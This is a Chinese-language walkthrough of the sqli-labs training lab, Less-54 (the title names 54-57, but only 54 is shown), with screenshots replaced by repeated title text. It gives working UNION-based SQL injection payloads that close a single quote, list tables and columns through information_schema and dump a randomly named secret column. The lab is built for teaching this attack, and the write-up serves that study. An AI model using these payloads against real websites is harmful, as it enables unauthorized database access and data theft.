Sqli-labs之Less:54-57

                                                Less-54

Sqli-labs之Less:54-57

基于错误_GET_单引号_字符型_UNION注入

Sqli-labs之Less:54-57

翻译:

                   请输入ID作为参数,数值与实验室时习相同
    此挑战的目标是在不到10次的尝试中从数据库(challenges)的随机表中转储(**)
    为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。

从 Less 54 - Less 65 这 12 关属于 Page 4:Challenges,这些是一些综合的注入训练,限制了查询的次数,更贴近于 GET 的实战。这也是整个 Sqli-Labs 的最后一部分。

现在我们将综合运用之前所学的各种注入技巧,拿到 **。

我们先正常访问下页面:

Sqli-labs之Less:54-57

从图中我们了解到了:Sqli-labs之Less:54-57

我们顺便看下核心源代码:

Sqli-labs之Less:54-57

Sqli-labs之Less:54-57

Sqli-labs之Less:54-57

详情请看源代码。

下面开始我们的注入:

?id=1'

?id=1"

Sqli-labs之Less:54-57

Sqli-labs之Less:54-57

双引号正常,单引号无报错回显,为字符型单引号闭合。(无法进行报错注入)

?id=1'--+

Sqli-labs之Less:54-57

正确回显,未过滤注释。

?id=0' union select 1,2,3--+

Sqli-labs之Less:54-57

既然有回显,在相应位置使用union注入即可。

 

该题提示我们数据库为challenges,我们可以在后台查看:

Sqli-labs之Less:54-57

但是这里数据表是随机生成的,到达10次后,可以 reset(重置)一下,数据表就会发生变化

爆表

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Sqli-labs之Less:54-57

爆字段:

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='iaem80ucss'--+

Sqli-labs之Less:54-57

那个secret加上奇奇怪怪字符的字段应该就是我们想要的。

爆数据:

由于尝试的次数达到10次,再次提交就会提醒我们并强制重置:

Sqli-labs之Less:54-57

上面的页面停留3秒后,返回到最初的页面:

Sqli-labs之Less:54-57

好吧,好吧,直接从爆表重新来过吧,这里就不在演示上面重复的操作,直接演示爆数据:

?id=0' union select 1,2,group_concat(secret_K2YN) from challenges.mtwan8eq7l--+

Sqli-labs之Less:54-57

在下面的输入框中输入 ** 即可,出现祝贺的图片:

Sqli-labs之Less:54-57

 

Sqli-labs之Less:54-57

congrats you nailed it -------->恭喜你成功了

这个成功的页面会在3秒后关闭,并强制重置到最初的页面,所以为了截这张图又特意做了一边,谁叫我截图慢了一步呢 ╮(-_-)╭

 

--------------------------------------- 分隔符 ----------------------------